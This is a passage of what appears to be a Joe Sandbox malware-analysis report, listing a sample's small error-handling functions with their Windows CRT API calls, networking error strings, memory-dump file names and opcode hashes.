_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Network has been reset, xrefs: 00007FF7F8D129CD

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Network has been reset
API String ID: 4135170618-381532975
Opcode ID: 8f3fa12307631ec0f5d64785a52070851fb09c23c018ce077d4f3d167a2a1246
Instruction ID: cfbe0ad9bb3b73dbe08a80cf5bb2f3b1c754face647302ced5cd5795f685d0e4
Opcode Fuzzy Hash: 8f3fa12307631ec0f5d64785a52070851fb09c23c018ce077d4f3d167a2a1246
Instruction Fuzzy Hash: A6F01D25A0DA4696E740AF65A504129F321FF5CB95FC80071DA6E03BD4CF3DE888E7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1299D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Address already in use, xrefs: 00007FF7F8D1299D

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Address already in use
API String ID: 4135170618-3458345520
Opcode ID: 0c4f1c0208c1057575a4d0e70bd10916dde76a9c710129c71fbd92d90181d68d
Instruction ID: 33fefa66fdb3fbf4fcd15856e55f4460b83161754fac211287627206c2ad06d0
Opcode Fuzzy Hash: 0c4f1c0208c1057575a4d0e70bd10916dde76a9c710129c71fbd92d90181d68d
Instruction Fuzzy Hash: 11F01D25A0DA4696E740AF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888E7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D129A9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Address not available, xrefs: 00007FF7F8D129A9

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Address not available
API String ID: 4135170618-1121827788
Opcode ID: 238a3fc0d2b3d220cda6aee35ddb82b25b0056b7a7a5e4e0b0d9cf77d73a4aa9
Instruction ID: 4c2abc6726fcc477c3734e016ccbb2a183bb1ee01ff7a564e6fe88df3f39f28c
Opcode Fuzzy Hash: 238a3fc0d2b3d220cda6aee35ddb82b25b0056b7a7a5e4e0b0d9cf77d73a4aa9
Instruction Fuzzy Hash: FDF01D25A0DA4686E740AF61A50412DF721FF5CB95F880071DA6E03BD4CF3DE849A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D129B5 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Network down, xrefs: 00007FF7F8D129B5

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Network down
API String ID: 4135170618-68288426
Opcode ID: 59c06a2025fa57dbfa701fd055f4d87c914c2a221ac81713ea469171c895b8c2
Instruction ID: 2ddd50e8dce5cb562098cd05dff78ba3b6d1cc0d75e58d32a5bcdae526506359
Opcode Fuzzy Hash: 59c06a2025fa57dbfa701fd055f4d87c914c2a221ac81713ea469171c895b8c2
Instruction Fuzzy Hash: 66F01725A0DA4686E740AF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12979 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Operation not supported, xrefs: 00007FF7F8D12979

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Operation not supported
API String ID: 4135170618-107827863
Opcode ID: a5d2e8d1821e0ee5fae2c56a496104cdda358f16f25be16ef14b288cb63d7c4a
Instruction ID: 69f4a0c1cb043f38d8c7be41b88fb86f9c3789f75b3d349d127e4352a105068f
Opcode Fuzzy Hash: a5d2e8d1821e0ee5fae2c56a496104cdda358f16f25be16ef14b288cb63d7c4a
Instruction Fuzzy Hash: 13F01D25A0DA4686E740AF61A50412DF321FF5CB95F880071DA6E03BD4CF3DE848A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12985 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Address family not supported, xrefs: 00007FF7F8D12985

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Address family not supported
API String ID: 4135170618-3092539563
Opcode ID: 097a147bdd45383524443a1f87e4d92a3841d1b397de2f6815b00343d085fe05
Instruction ID: 64e2ae458215a9e6bb7c880d50d93f033dd6c7d4e62b20dfd6ee1a105debe527
Opcode Fuzzy Hash: 097a147bdd45383524443a1f87e4d92a3841d1b397de2f6815b00343d085fe05
Instruction Fuzzy Hash: 80F01D25A0DA4686E740AF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888E7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12991 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Protocol family not supported, xrefs: 00007FF7F8D12991

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Protocol family not supported
API String ID: 4135170618-3651057236
Opcode ID: 9ef8ad2a5574b306d4c07514ab9881952d263a0973bdee9d4f5d2fd88efe740f
Instruction ID: a3bf47fe0697abea7b93acd15355222b8afca41c1ab2a584063f46c819e5c17b
Opcode Fuzzy Hash: 9ef8ad2a5574b306d4c07514ab9881952d263a0973bdee9d4f5d2fd88efe740f
Instruction Fuzzy Hash: E0F01725A0DA4686E740AF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12961 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Protocol is unsupported, xrefs: 00007FF7F8D12961

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Protocol is unsupported
API String ID: 4135170618-4145053010
Opcode ID: 42a2aa605b2b27548365df711ea50b2d0268f65a8af4025c3be454995e14b9cb
Instruction ID: 16fcafb872b1f492d2b4056e58b7c065f839bed4dfc7ffe936134d9e2695aa6b
Opcode Fuzzy Hash: 42a2aa605b2b27548365df711ea50b2d0268f65a8af4025c3be454995e14b9cb
Instruction Fuzzy Hash: D5F01D25A0DA4686E740AF61A50412DF321FF5CB95F880071DA6E13BD4CF3DE848A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1296D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Socket is unsupported, xrefs: 00007FF7F8D1296D

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Socket is unsupported
API String ID: 4135170618-1818884963
Opcode ID: c342ca95e42bf927b678b3848897e671715324e6f00bef1214f527418c0be7c4
Instruction ID: b34db74cba8d9e3e3a758815af8856118d823af9d5d6248d23557201b42fd749
Opcode Fuzzy Hash: c342ca95e42bf927b678b3848897e671715324e6f00bef1214f527418c0be7c4
Instruction Fuzzy Hash: 16F01725A0DA4686E740AF61A504129F321FF5CBD5F880071DA6E03BD4CF3DE888A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D1293D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Bad message size, xrefs: 00007FF7F8D1293D

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Bad message size
API String ID: 4135170618-3333243842
Opcode ID: 7d7bade0ea4956d7ebf532a0647fef93faaed68fff1d1590ba2f9ca39a7e82ab
Instruction ID: 7215184f74c11945967ae9f2d33e0a7bd063a8b0cc690c4ca8aefa7ba11f1d87
Opcode Fuzzy Hash: 7d7bade0ea4956d7ebf532a0647fef93faaed68fff1d1590ba2f9ca39a7e82ab
Instruction Fuzzy Hash: FAF01D25A0DA4686E740AF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12949 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Bad protocol, xrefs: 00007FF7F8D12949

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Bad protocol
API String ID: 4135170618-3251168116
Opcode ID: 7a85d6a2444bd8c35f1df986206a8430a2c1e422b70908fab0cf8e139006da45
Instruction ID: 8cb863b092303cb1eecb7b853ccdfd2fcaed5cebc1bbcec2c3f0cc5dfae5465d
Opcode Fuzzy Hash: 7a85d6a2444bd8c35f1df986206a8430a2c1e422b70908fab0cf8e139006da45
Instruction Fuzzy Hash: 80F01725A0DA4686E740AF61A504129F321FF5CB95F880071DA6E03BD4CF3DE888A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12955 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BA6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BB2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BC4
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,00007FF7F8D12CFF,?,?,?,?,?,?,?,?,?,?,?,00007FF7F8D16B46), ref: 00007FF7F8D12BD0

Strings

Protocol option is unsupported, xrefs: 00007FF7F8D12955

Memory Dump Source

Source File: 00000004.00000002.375582930.00007FF7F8D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF7F8D00000, based on PE: true

Associated: 00000004.00000002.375579996.00007FF7F8D00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375589399.00007FF7F8D4B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375593291.00007FF7F8D66000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.375595742.00007FF7F8D67000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff7f8d00000_bpzs.jbxd

Similarity

API ID: ErrorLast_errno$strncpy
String ID: Protocol option is unsupported
API String ID: 4135170618-2447703105
Opcode ID: cdbe8fff7c235e2b5b70781e67c2b9f7cb14dcdf91a2fe22f423ebb3431f2b73
Instruction ID: 12792899bf546755f89adeac3778a78d05651ba4734d2c18728b67ed07843fa9
Opcode Fuzzy Hash: cdbe8fff7c235e2b5b70781e67c2b9f7cb14dcdf91a2fe22f423ebb3431f2b73
Instruction Fuzzy Hash: B5F01D25A0DA46C6E740AF61A50412DF321FF5CB95F880071DA6E03BD4CF3DE888A7A8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F8D12919 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24stringCOMMON

Download Yara Rule

APIs

